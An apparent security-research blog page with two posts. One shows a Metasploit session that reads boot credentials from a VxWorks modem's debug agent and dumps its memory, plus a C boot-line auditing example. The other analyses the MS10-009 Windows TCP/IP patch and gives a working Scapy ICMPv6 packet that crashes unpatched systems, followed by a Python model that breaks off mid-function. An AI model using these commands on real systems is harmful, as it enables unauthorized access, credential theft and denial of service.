Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">#endif /* INCLUDE_SECURITY */<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: 
small;">printLogo (); /* print out the banner page */<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">printf (" ");<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">printf ("CPU: %s. Processor #%d.\n", sysModel (), sysProcNumGet ());<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">printf (" ");<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">printf ("Memory Size: 0x%x.", sysMemTop () - (char *)LOCAL_MEM_LOCAL_ADRS);<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">printf (" BSP version %s.\n\n", bspVersion ());<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">(…)</span></span><o:p></o:p></span></div><div class="MsoNormal"><br />
</div><div class="MsoNormal"><span lang="EN-US">Authentication is optional – <span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">INCLUDE_SECURITY</span></span> must be defined at compile time, otherwise the login code quoted above is simply not compiled in.<o:p></o:p></span><br />
<span lang="EN-US"><br />
</span></div><div class="MsoNormal"><span lang="EN-US">By default, <span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">loginUserAdd()</span></span> must be called to create each user account at run time - there is no user/password "file" (since there might be no filesystem at all on the target system).<o:p></o:p></span><br />
<span lang="EN-US"><br />
</span></div><div class="MsoNormal"><span lang="EN-US">Passwords are "encrypted" with a VxWorks-proprietary algorithm. </span>Quoting <a href="http://www.xs4all.nl/~borkhuis/vxworks/vxw_pt1.html">http://www.xs4all.nl/~borkhuis/vxworks/vxw_pt1.html</a>:</div><div class="MsoNormal"><blockquote>"<i>Q: How can I create (encrypted) passwords?</i></blockquote></div><div class="MsoNormal"><blockquote><i>A: You can use vxencrypt that comes with Tornado to create passwords, but it is pretty weak.</i></blockquote></div><div class="MsoNormal"><blockquote><i>I think it is sum( p[i] * i ^ i )) * 0x1e3a1d5 converted to ascii with a munged hex character set (presumably to make you think there are more than 2^32 encrypted passwords). I think I could reverse that using pen and paper.</i>"</blockquote>Therefore, it is possible to log into any VxWorks 5 system in its default configuration by following these steps:</div><div class="MsoNormal"><br />
<ul><li>Grab a copy of the firmware (more about this later)</li>
<li>Find the banner printing code</li>
<li>Look a few opcodes before - you will presumably find call(s) to <span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">loginUserAdd()</span></span>.</li>
<li>Reverse passwords (using pen and paper ;)</li>
</ul></div><div class="MsoNormal"><b><span class="Apple-style-span" style="font-size: x-large;">Practical use case</span></b><br />
<br />
</div><div class="MsoNormal"><span lang="EN-US">Let's take the <a href="http://assistance.sfr.fr/internet_trio3C/accueil/votre-assistance/as-743-65855">Trio3C</a> broadband modem that was widely distributed by <a href="http://fr.wikipedia.org/wiki/Neuf_Telecom">Neuf Telecom</a> a few years ago. This model has since been superseded by the <a href="http://www.neufbox4.org/">NeufBox4</a>, and second-hand units can be found for less than 5 euros nowadays. </span>The Trio3C appears to be running VxWorks 5, with remote debugging enabled.</div><div class="MsoNormal"><span lang="EN-US"><br />
</span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">$ ./msfconsole <o:p></o:p></span></span></span></div><div class="MsoNormal"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> _ _ _ _<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> | | | | (_) |<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> _ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> | |<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> 
|_|<o:p></o:p></span></span></span></div><div class="MsoNormal"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span></div><div class="MsoNormal"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> =[ metasploit v3.4.2-dev [core:3.4 api:1.0]<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">+ -- --=[ 584 exploits - 297 auxiliary<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">+ -- --=[ 219 payloads - 27 encoders - 8 nops<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> =[ svn r10182 updated today (2010.08.29)<o:p></o:p></span></span></span></div><div class="MsoNormal"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">msf &gt; use auxiliary/scanner/vxworks/wdbrpc_bootline <o:p></o:p></span></span></span><br />
<span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">msf auxiliary(wdbrpc_bootline) &gt; set RHOSTS 192.168.1.1/32<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">RHOSTS =&gt; 192.168.1.1/32<o:p></o:p></span></span></span><br />
<span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">msf auxiliary(wdbrpc_bootline) &gt; run<o:p></o:p></span></span></span></div><div class="MsoNormal"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">[*] 192.168.1.1: VxWorks5.4.2 Centillium Palladia 4K <o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">[*] 192.168.1.1: BOOT: tffs=0,0(0,0)host:/tffs/vxworks.s e=192.168.1.4:0xffffff00 h=192.168.1.10 u=p220 pw=p220<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">[*] Scanned 1 of 1 hosts (100% complete)<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">[*] Auxiliary module execution completed<o:p></o:p></span></span></span></div><div class="MsoNormal"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">msf auxiliary(wdbrpc_bootline) &gt; use auxiliary/admin/vxworks/wdbrpc_memory_dump <o:p></o:p></span></span></span><br />
<span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">msf auxiliary(wdbrpc_memory_dump) &gt; set RHOST 192.168.1.1<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">RHOST =&gt; 192.168.1.1<o:p></o:p></span></span></span><br />
<span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">msf auxiliary(wdbrpc_memory_dump) &gt; set LPATH /tmp/memory.dmp<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">LPATH =&gt; /tmp/memory.dmp<o:p></o:p></span></span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"><br />
</span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">msf auxiliary(wdbrpc_memory_dump) &gt; run<o:p></o:p></span></span></span></div><div class="MsoNormal"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">[*] Attempting to dump system memory...<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">[*] 192.168.1.1 Connected to VxWorks5.4.2 - Centillium Palladia 4K ()<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">[*] Dumping 0x00fef800 bytes from base address 0x80000000 at offset 0x00000000...<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">[*] [ 00 % ] Downloaded 0x00000b18 of 0x00fef800 bytes (complete at Sun Aug 29 09:55:11 +0200 2010)<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">[*] [ 00 % ] Downloaded 0x000010a4 of 0x00fef800 bytes (complete at Sun Aug 29 09:55:34 +0200 2010)<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">(...)<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">[*] Dumped 0x00fefba0 
bytes.<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">[*] Auxiliary module execution completed</span></span><o:p></o:p></span></div><div class="MsoNormal"><br />
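The boot line that wdbrpc_bootline returned above carries, besides the boot device and addresses, the credentials the target uses towards its boot host (u= and pw=; VxWorks uses FTP when pw= is non-empty and rsh otherwise) and the boot flags, one of which (0x20) turns login security off. Since anything that can talk to the WDB agent can read that line, it is worth auditing on every VxWorks target in an inventory. Below is an added C example (written for this page, not part of the original post or of Metasploit) of a parser for the boot line format together with the two findings a defender would want flagged. The first sample line is the Trio3C boot line from the session above; the second sample line, the struct and function names, and the finding codes are constructed for the example. Only the 0x20 flag bit is decoded.

```c
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BL_MAX 256
#define SYSFLG_NO_SEC 0x20UL   /* VxWorks boot flag bit 5: disable login security */

/* The boot line fields used here. The first blank-separated token is the boot
 * device / file spec; every following token is a key=value pair. */
typedef struct {
    char boot_dev[BL_MAX];   /* e.g. "tffs=0,0(0,0)host:/tffs/vxworks.s" */
    char inet_eth[BL_MAX];   /* e=  target address[:netmask] */
    char host_inet[BL_MAX];  /* h=  boot host address */
    char user[BL_MAX];       /* u=  user on the boot host */
    char password[BL_MAX];   /* pw= FTP password on the boot host (empty: rsh) */
    unsigned long flags;     /* f=  boot flags */
    int other_keys;          /* g=, tn=, s=, o=, ...: counted, not decoded */
} bootline_t;

/* Parse one boot line into bl. Returns false for empty or oversized input. */
bool bootline_parse(const char *line, bootline_t *bl) {
    char buf[BL_MAX];
    memset(bl, 0, sizeof *bl);
    if (strlen(line) >= sizeof buf) return false;
    strcpy(buf, line);

    char *tok = strtok(buf, " \t\r\n");
    if (tok == NULL) return false;           /* nothing but blanks */
    strcpy(bl->boot_dev, tok);

    while ((tok = strtok(NULL, " \t\r\n")) != NULL) {
        char *eq = strchr(tok, '=');
        if (eq == NULL) { bl->other_keys++; continue; }
        *eq = '\0';
        const char *key = tok, *val = eq + 1;
        if      (strcmp(key, "e")  == 0) strcpy(bl->inet_eth, val);
        else if (strcmp(key, "h")  == 0) strcpy(bl->host_inet, val);
        else if (strcmp(key, "u")  == 0) strcpy(bl->user, val);
        else if (strcmp(key, "pw") == 0) strcpy(bl->password, val);
        else if (strcmp(key, "f")  == 0) bl->flags = strtoul(val, NULL, 0);
        else bl->other_keys++;
    }
    return true;
}

/* Findings on a boot line that is readable through the WDB agent. */
enum {
    BL_FIND_CLEARTEXT_PW = 1,   /* pw= set: boot-host FTP password exposed */
    BL_FIND_NO_SEC       = 2,   /* f has 0x20: shell login security disabled */
};

int bootline_findings(const bootline_t *bl) {
    int f = 0;
    if (bl->password[0] != '\0')   f |= BL_FIND_CLEARTEXT_PW;
    if (bl->flags & SYSFLG_NO_SEC) f |= BL_FIND_NO_SEC;
    return f;
}

int main(void) {
    /* First line: the Trio3C boot line from the session above. Second: constructed. */
    const char *samples[] = {
        "tffs=0,0(0,0)host:/tffs/vxworks.s e=192.168.1.4:0xffffff00 h=192.168.1.10 u=p220 pw=p220",
        "fei(0,0)buildhost:vxWorks e=10.0.0.2 h=10.0.0.1 u=target f=0x20 tn=t1",
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        bootline_t bl;
        if (!bootline_parse(samples[i], &bl)) { printf("unparseable boot line\n"); continue; }
        int f = bootline_findings(&bl);
        printf("%s\n  user=%s host=%s flags=0x%lx%s%s\n", bl.boot_dev, bl.user,
               bl.host_inet, bl.flags,
               (f & BL_FIND_CLEARTEXT_PW) ? " [cleartext boot-host password]" : "",
               (f & BL_FIND_NO_SEC)       ? " [login security disabled]" : "");
    }
    return 0;
}
```

The point of the check is that the boot parameters are a second place, next to the loginUserAdd() calls discussed above, where credentials end up on a VxWorks target, and that they are readable without any reverse engineering once the WDB agent is reachable: the modem above hands out its boot-host user and password to anyone who asks.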
</div><div class="MsoNormal"><span lang="EN-US">The complete memory dump decompiles cleanly in <a href="http://hex-rays.com/idapro/">IDA Pro</a> [*] (the ROM base address is kindly provided by the debugger).<o:p></o:p></span><br />
<span lang="EN-US"><br />
</span><br />
<span lang="EN-US">Unfortunately for the demo, it appears that no hardcoded account is to be found. User accounts and (cleartext) passwords are stored within a configuration file. But that was a fun exercise anyway :)</span><br />
<span lang="EN-US"><br />
</span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://newsoft.dyndns.org/tech/VxWorks.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://newsoft.dyndns.org/tech/VxWorks.png" /></a></div><br />
</div><span class="Apple-style-span" style="font-size: small;">[*] Actually not, I had to request a patch for the MIPS processor module :)</span>newsofthttp://www.blogger.com/profile/04331742158137961313noreply@blogger.com3tag:blogger.com,1999:blog-26480225.post-46735076599598874012010-02-24T23:00:00.002+01:002010-02-24T23:00:02.012+01:00MS10-009A very long time ago, Microsoft patches used to be boring. Then Microsoft invented the <a href="http://microsoft.com/sdl">SDL</a>. The amount of patches and vulnerabilities fixed in Microsoft products did not decrease, but each bug became a unique and very interesting one...<br />
<br />
<a href="http://www.microsoft.com/technet/security/bulletin/ms10-feb.mspx">February 2010 patches</a> are no exception to this rule: each one of them provides enlightenment for the security researcher.<br />
<br />
Let's begin this blog series with <a href="http://www.microsoft.com/technet/security/bulletin/MS10-009.mspx">MS10-009</a>: "Vulnerabilities in Windows TCP/IP Could Allow Remote Code Execution". This is some kind of Holy Grail in computer security: remote code execution through IP packets only!<br />
<br />
First of all, this flaw affects Windows Vista and Windows 2008 Server "R1" only. For Windows Vista, Microsoft rewrote the whole TCP/IP stack with the objective to build a native IPv4/IPv6 dual stack. In the process they added a lot of kernel stuff, such as <a href="http://blogs.msdn.com/wndp/archive/2006/02/24/538746.aspx">Winsock Kernel</a> (WSK), and they removed deprecated stuff, such as SYN Flood protections (<a href="http://technet.microsoft.com/en-us/library/cc938202.aspx">SynAttackProtect</a> et al. registry keys).<br />
<br />
Writing a TCP/IP stack is not a task for the faint of heart. Despite Microsoft hiring all sorts of talented engineers, the new stack <a href="http://www.symantec.com/avcenter/reference/ATR-VistaAttackSurface.pdf">was found vulnerable</a> to Blat (before build 5270), <a href="http://en.wikipedia.org/wiki/Land_attack">Land</a> (before build 5270) and <a href="http://en.wikipedia.org/wiki/Teardrop_attack#Teardrop_Attacks">Teardrop</a> (before build 5384) attacks.<br />
<br />
Even after Vista public release, several security bulletins have been published, addressing issues in the new TCP/IP stack - namely: <a href="http://www.microsoft.com/technet/security/Bulletin/MS08-001.mspx">MS08-001</a>, <a href="http://www.microsoft.com/technet/security/Bulletin/MS08-004.mspx">MS08-004</a> (this one being specific to Vista) and <a href="http://www.microsoft.com/technet/security/Bulletin/MS09-048.mspx">MS09-048</a> (this one having a rating of "critical" on Windows Vista and 2008 only).<br />
<br />
Therefore, Windows Vista and 2008 TCP/IP stack cannot be considered "mature" and remains an interesting playground for security researchers. Interestingly, MS10-009 vulnerabilities were silently fixed in Windows Seven and 2008 "R2", showing that Microsoft engineers are doing their homework on their side.<br />
<br />
Now let's get to the point:<br />
<div></div>1. ICMPv6 Router Advertisement Vulnerability - CVE-2010-0239<br />
<em>"A remote code execution vulnerability exists in the Windows TCP/IP stack due to insufficient bounds checking when processing specially crafted ICMPv6 Router Advertisement packets. An anonymous attacker could exploit the vulnerability by sending specially crafted ICMPv6 Router Advertisement packets to a computer with IPv6 enabled."</em><br />
<br />
2. Header MDL Fragmentation Vulnerability - CVE-2010-0240<br />
<em>"A remote code execution vulnerability exists in the Windows TCP/IP stack due to the manner in which the TCP/IP stack handles specially crafted Encapsulating Security Payloads (ESP) over UDP datagram fragments when running a custom network driver."</em><br />
<br />
3. ICMPv6 Route Information Vulnerability - CVE-2010-0241<br />
<em>"A remote code execution vulnerability exists in the Windows TCP/IP stack due to insufficient bounds checking when processing specially crafted ICMPv6 Route Information packets. An anonymous attacker could exploit the vulnerability by sending specially crafted ICMPv6 Route Information packets to a computer with IPv6 enabled."</em><br />
<br />
4. TCP/IP Selective Acknowledgement Vulnerability - CVE-2010-0242<br />
<em>"A denial of service vulnerability exists in TCP/IP processing in Microsoft Windows due to an error in the processing of specially crafted TCP packets with a malformed selective acknowledgment (SACK) value."</em><br />
<br />
According to <a href="http://support.microsoft.com/kb/974145">KB974145</a>, several files are updated by MS10-009 patch. However we are going to focus on where the meat is, namely "TCPIP.SYS". All screenshots below apply to Windows 2008 "R1" English 32-bit.<br />
<br />
Using <a href="http://www.zynamics.com/bindiff.html">BinDiff 3</a>, it quickly appears that 39 functions have a similarity of less than "1.00".<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://newsoft.dyndns.org/tech/ms10_009_diff.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="512" kt="true" src="http://newsoft.dyndns.org/tech/ms10_009_diff.png" width="640" /></a></div><br />
<div>Thanks to debugging symbols provided by Microsoft, matching flaws with function names is pretty straightforward:</div><ul><li>IppIsUdpEspPacket / IppReceiveUdpEspList will probably be in the path of flaw #2.</li>
<li>TcpEnqueueTcbSack will probably be in the path of flaw #4.</li>
<li>IppHandleNeighborAdvertisement / Ipv6pHandleRouterAdvertisement will probably be in the path of flaws #1 and #3, which we are targeting today.</li>
</ul>From that point, diffing is pretty straightforward.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://newsoft.dyndns.org/tech/ms10_009_diff_v6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="384" kt="true" src="http://newsoft.dyndns.org/tech/ms10_009_diff_v6.png" width="640" /></a></div><div></div>On the left side (patched version), the option length is tested against 0x20 before the data is fetched, whereas on the right side (vulnerable version), the same test only happens after the fetch.<br />
<br />
Let's have a deeper look at the <a href="http://msdn.microsoft.com/en-us/library/bb259912.aspx">NdisGetDataBuffer</a> function, which is new to NDIS 6 (Windows Vista and up):<br />
<br />
"<em>Call the NdisGetDataBuffer function to gain access to a contiguous block of data from a NET_BUFFER structure.</em><br />
<br />
<pre>PVOID NdisGetDataBuffer(
    IN PNET_BUFFER NetBuffer,
    IN ULONG BytesNeeded,
    IN PVOID Storage,
    IN UINT AlignMultiple,
    IN UINT AlignOffset
);</pre>
<em>(…)</em><br />
<em><strong>Storage</strong>: a pointer to a buffer, or NULL if no buffer is provided by the caller. The buffer must be greater than or equal in size to the number of bytes specified in BytesNeeded. <strong>If this value is non-NULL, and the data requested is not contiguous, NDIS copies the requested data to the area indicated by Storage.</strong></em>"<br />
<br />
This API is quite hard to understand and clearly violates the principle of least surprise.<br />
<br />
The <a href="http://msdn.microsoft.com/en-us/library/bb245897.aspx">NET_BUFFER</a> structure holds a <a href="http://msdn.microsoft.com/en-us/library/bb245893.aspx">NET_BUFFER_HEADER</a> structure, in which a <a href="http://msdn.microsoft.com/en-us/library/bb245889.aspx">NET_BUFFER_DATA</a> structure can be found, which stores a <a href="http://www.microsoft.com/whdc/driver/tips/mdl.mspx">Memory Descriptor List</a> (MDL).<br />
<br />
Let's assume that the caller passed a non-NULL <strong>Storage</strong> parameter to this function. If all packet data already sits in a single (contiguous) memory area, NdisGetDataBuffer simply returns a pointer to this area and nothing is copied. However, if packet data is split across several memory areas, NdisGetDataBuffer concatenates <strong>BytesNeeded</strong> bytes into the <strong>Storage</strong> buffer. <em>This is where the flaw lies: <strong>Storage</strong> is a fixed-size buffer of 0x20 bytes on the kernel stack</em> (in the case of the Prefix Info option, whose legitimate size is exactly 0x20 bytes per RFC 4861), <em>whereas <strong>BytesNeeded</strong> is derived from the attacker-controlled option length</em> (options being passed in Type-Length-Value format, the length being expressed in 8-byte units).<br />
<br />
Now, the last question is: how to force the packet data to land in non-contiguous memory areas? The answer is obvious: IPv6 fragmentation, since packets are copied into memory "as is" at NDIS level, so each fragment ends up in its own buffer and the reassembled option spans several of them …<br />
<br />
A bit of <a href="http://www.natisbad.org/scapy/">Scapy</a> magic later, here is one possible command to invoke the dreaded Blue Screen of Death on an unpatched IPv6-enabled system sitting on the same link. This is a fragmented Router Advertisement (RA) carrying a non-standard "Prefix Info" option whose Length field is 255. Please note that option size is given in multiples of 8 bytes, therefore the kernel will try to fetch 255*8 = 2040 bytes (the 32-byte option itself plus 2008 bytes of 0x41 padding) into a 0x20-byte stack buffer, trashing about 2 KB of kernel stack with byte 0x41.<br />
<blockquote><pre>from scapy.all import *   # Scapy with IPv6 support (Scapy6 at the time of writing)

# Link-local address and MAC of the target: RAs are only accepted with hop limit 255,
# so the attacker has to be on the same link.
v6_dst = "fe80::bd92:3788:79b0:c5d1"
mac_dst = "00:0c:29:de:9b:a8"

# RA with a Prefix Info option claiming 255*8 = 2040 bytes:
# 32 bytes of real option, then 2008 bytes of 'A' to fill the claimed length.
# The Fragment extension header lets fragment6() split it across several packets.
pkt = IPv6(dst=v6_dst, hlim=255) / IPv6ExtHdrFragment() / ICMPv6ND_RA() / ICMPv6NDOptPrefixInfo(len=255, prefixlen=64, prefix="2001::") / Raw(load='A'*2008)

# Split into 1500-byte fragments; each fragment is received into its own buffer.
l = fragment6(pkt, 1500)

for p in l:
    sendp(Ether(dst=mac_dst)/p, iface="eth0")</pre></blockquote>This is not the only NdisGetDataBuffer-based flaw that has been fixed, therefore other ICMPv6 options could be used to achieve the same result.<br />
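As an added example (not code from the original post, nor Microsoft's), the following pure-Python model of the bug class can be run without Scapy or a target. It builds the same ICMPv6 Router Advertisement the Scapy one-liner above produces (RFC 4861 wire format), walks its option TLVs, and contrasts the vulnerable order of operations (fetch the option into a 0x20-byte <strong>Storage</strong>, then test its length) with the patched one (test the length, then fetch). The <code>Storage</code> class, the handler names and the "crashed" result are inventions of this example, and the "fragmentation" is simply slicing the ICMPv6 payload into separate buffers.

```python
"""Added example, not code from the original post or from Microsoft: a pure-Python
model of the bug class described above, runnable without Scapy or a target. It
builds the ICMPv6 Router Advertisement the Scapy one-liner produces (RFC 4861
wire format), walks its option TLVs, and contrasts the vulnerable order of
operations (fetch the option into a 0x20-byte Storage, then test its length)
with the patched one (test the length, then fetch). The Storage class, the
handler names and the "crashed" result are inventions of this example."""
import struct

ICMPV6_ROUTER_ADVERTISEMENT = 134
ND_OPT_PREFIX_INFORMATION = 3
RA_HEADER_BYTES = 16       # type, code, checksum, hop limit, flags, lifetime, 2 x 32-bit timers
PREFIX_INFO_BYTES = 0x20   # RFC 4861: Prefix Information is exactly 4 units of 8 octets


def build_prefix_info(length_units, prefix_len=64, prefix=bytes.fromhex("2001" + "00" * 14)):
    """Prefix Information option whose Length field we are free to lie about, like
    the Scapy packet (len=255 followed by 2008 bytes of padding)."""
    header = struct.pack("!BBBBIII", ND_OPT_PREFIX_INFORMATION, length_units,
                         prefix_len, 0xC0, 2592000, 604800, 0)
    option = header + prefix                            # 32 bytes when length_units == 4
    return option + b"A" * max(0, length_units * 8 - len(option))


def build_ra(options):
    """RA header with a zero checksum (a real sender fills it over the IPv6 pseudo-header)."""
    return struct.pack("!BBHBBHII", ICMPV6_ROUTER_ADVERTISEMENT, 0, 0, 64, 0, 1800, 0, 0) + options


def iter_nd_options(icmp):
    """Yield (type, start, end) for each TLV after the RA header; Length is in 8-octet units."""
    off = RA_HEADER_BYTES
    while off + 2 <= len(icmp):
        otype, olen = icmp[off], icmp[off + 1]
        if olen == 0 or off + olen * 8 > len(icmp):
            raise ValueError("malformed ND option")      # RFC 4861: discard the packet
        yield otype, off, off + olen * 8
        off += olen * 8


def pieces_of(fragments, start, end):
    """The bytes of [start, end) as they sit in the per-fragment receive buffers."""
    out, base = [], 0
    for frag in fragments:
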